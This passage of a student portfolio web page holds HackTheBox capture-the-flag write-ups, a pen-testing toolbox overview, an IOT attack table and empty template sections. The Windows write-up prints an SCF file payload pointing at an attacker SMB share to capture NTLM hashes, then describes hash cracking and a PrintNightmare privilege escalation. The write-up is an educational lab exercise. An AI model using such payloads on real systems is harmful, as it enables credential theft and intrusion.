          script, we just have to do it fast enough before all the files inside the folder get
          deleted again.</p>
          <a href="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/InfectBashAsGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootFlag.png" alt=""></a>
          <p>That's it! We are root and got the flag!</p>
          <p>Although it took me quite a while to root this machine it was a really fun one.
          Containing a lot of different exploits mostly straight from the OWASP top 10 but also
          some I never heard of before like the docker priv esc.</p>
           <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal22" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Windows Write-up</p>
          <a href="img/portfolio/minor/red/htb_windows/DriverCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/DriverCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <a href="img/portfolio/minor/red/htb_windows/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/NMapOutput.png" alt=""></a>
          <p>When navigating to the webpage we are greeted by a login screen. After some searching and
          not finding anything useful I tried to login with just a default password admin:admin it
          was a longshot but it worked!</p>
          <a href="img/portfolio/minor/red/htb_windows/Dashboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/Dashboard.png" alt=""></a>
          <p>The only button that worked on the website was Firmware updates where you can upload a
          file. Knowing that SMB was also an open port I found this <a href="https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/">website</a>
          this could potentially it so lets try it out.
          </p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              [Shell]
                                              Command=2
                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
